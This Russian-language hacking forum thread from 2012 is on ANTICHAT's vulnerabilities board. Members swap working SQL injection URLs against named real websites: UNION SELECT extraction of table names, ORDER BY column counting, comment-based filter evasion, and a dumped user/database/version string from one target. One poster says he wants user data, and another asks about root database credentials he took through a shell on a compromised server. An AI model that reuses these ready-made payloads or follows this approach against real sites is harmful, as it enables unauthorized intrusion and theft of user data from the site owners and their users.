HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #19581  
Старый 09.02.2012, 13:22
Melfis
Постоянный
Регистрация: 25.04.2011
Сообщений: 505
С нами: 7921046

Репутация: 53


По умолчанию

Цитата:
Сообщение от ivan151  
есть ли запрос чтобы не юзать постоянно лимит(я о такой конструкции union+select+1,2,3,4,table_name+from+information_s chema.tables+limit+1,1) а что-бы вывести все таблицы с одного поля или нескольких,просто есть всего 2 поля
select concat(@i:=0,@a:=0x3a,benchmark(666,@a:=concat(@a, 0x3a,(select @i:=table_name from information_schema.tables where table_name>@i limit 1))),@a)

где 666 - кол-во строк не более максимального значения в таблице.
 
Ответить с цитированием

  #19582  
Старый 09.02.2012, 14:51
smirk
Участник форума
Регистрация: 08.09.2011
Сообщений: 137
С нами: 7725206

Репутация: 26
По умолчанию

Цитата:
Сообщение от ivan151  
вобщем вот сайт http://1liceum.ru/shownew.php?setid=-1+union+select+1,2,3,4,5--
всего для вывода 2 поля,ну допустим юзаю лимит и таким запросом http://1liceum.ru/shownew.php?setid=-1+union+select+1,2,3,4,table_name+from+information _schema.tables+limit+0,1 пытаюсь узнать имена таблиц(мне нужны данные пользователей) и меняя лимит выводит другие таблицы вот например там есть:
CHARACTER_SETS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
KEY_COLUMN_USAGE
PROFILING
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
answer
но в какой таблице данные пользователей и как их вытащить? и ещё можно ли тут использовать ' UNION SELECT TOP 1 login FROM users-- и если да то как это должно выглядеть?
может лучше почитать мануал?

там все популярно расписано...
 
Ответить с цитированием

  #19583  
Старый 09.02.2012, 17:46
anonym_di
Познающий
Регистрация: 21.01.2012
Сообщений: 55
С нами: 7530806

Репутация: 0
По умолчанию

Всем Хай, вот есть сайт

http://www.lingvoinfo.com/?link=-115/*+union+select+,1,2,3,4*/ => при таком запросе у меня почему-то выводит число 0 как можно провести SQLi ???
 
Ответить с цитированием

  #19584  
Старый 09.02.2012, 18:32
pirat0
Познающий
Регистрация: 16.01.2011
Сообщений: 71
С нами: 8063606

Репутация: -1
По умолчанию

Цитата:
Сообщение от anonym_di  
Всем Хай, вот есть сайт
http://www.lingvoinfo.com/?link=-115/*+union+select+,1,2,3,4*/ => при таком запросе у меня почему-то выводит число 0 как можно провести SQLi ???
http://www.lingvoinfo.com/?link=115+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17,version(),19,20,21,22,23,24,25,26+--+ вот так нужно
 
Ответить с цитированием

  #19585  
Старый 09.02.2012, 18:46
anonym_di
Познающий
Регистрация: 21.01.2012
Сообщений: 55
С нами: 7530806

Репутация: 0
По умолчанию

Цитата:
Сообщение от pirat0  
http://www.lingvoinfo.com/?link=115+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17,version(),19,20,21,22,23,24,25,26+--+ вот так нужно
как ты узнал кол-во табл??
 
Ответить с цитированием

  #19586  
Старый 09.02.2012, 18:50
Ereee
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
С нами: 7604246

Репутация: 267


По умолчанию

Смотри, там у тебя два запроса.

http://www.lingvoinfo.com/?link=115+ORDER+by+25 false+true

http://www.lingvoinfo.com/?link=115+ORDER+by+27 false+false

http://www.lingvoinfo.com/?link=115+ORDER+by+26 false+true

Соответственно, кол-во = 26.
 
Ответить с цитированием

  #19587  
Старый 09.02.2012, 18:58
Always
Познающий
Регистрация: 08.02.2012
Сообщений: 72
С нами: 7504886

Репутация: 0
По умолчанию

Цитата:
Сообщение от anonym_di  
как ты узнал кол-во табл??
Цитата:
Сообщение от Ereee  
Смотри, там у тебя два запроса.
http://www.lingvoinfo.com/?link=115+ORDER+by+25 false+true
http://www.lingvoinfo.com/?link=115+ORDER+by+27 false+false
http://www.lingvoinfo.com/?link=115+ORDER+by+26 false+true
Соответственно, кол-во = 26.
амне показалось фильтрация идет

http://www.lingvoinfo.com/?link=115/**/order/**/by/**/26+--+ true

http://www.lingvoinfo.com/?link=115/**/order/**/by/**/27+--+ false
 
Ответить с цитированием

  #19588  
Старый 09.02.2012, 19:06
qaz
Познавший АНТИЧАТ
Регистрация: 12.07.2010
Сообщений: 1,546
С нами: 8334326

Репутация: 75


По умолчанию

Помогите со скулёй, чёт никак не выходит

Цитата:
Сообщение от None  
http://www.porsche-spb.ru/model.phtml?id=13
 
Ответить с цитированием

  #19589  
Старый 09.02.2012, 19:09
aydin-ka
Новичок
Регистрация: 03.05.2009
Сообщений: 7
С нами: 8960082

Репутация: -14
По умолчанию

Цитата:
Сообщение от qaz  
Помогите со скулёй, чёт никак не выходит
Код:
http://www.porsche-spb.ru/model.phtml?id=9999999+union+select+1,2,3,concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29,5,6,7--+
porsche_main@localhostorsche_main:5.5.19

Вроде все стандартно...
 
Ответить с цитированием

  #19590  
Старый 09.02.2012, 19:43
pirat0
Познающий
Регистрация: 16.01.2011
Сообщений: 71
С нами: 8063606

Репутация: -1
По умолчанию

граждане, вопрос такой, есть шелл, нашол root конфиг бд пароль и логин, коннектился root-ом к базе пару недель назад все гуд, а сейчас пишет Access denied for user 'root'@'localhost' (using password: YES), думал пароль сменили, проверил - нет, таже связка логина и пароля, вопрос - в чем прикол??

p.s. если конекчюсь не рутом, все норм, коннект происходит
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.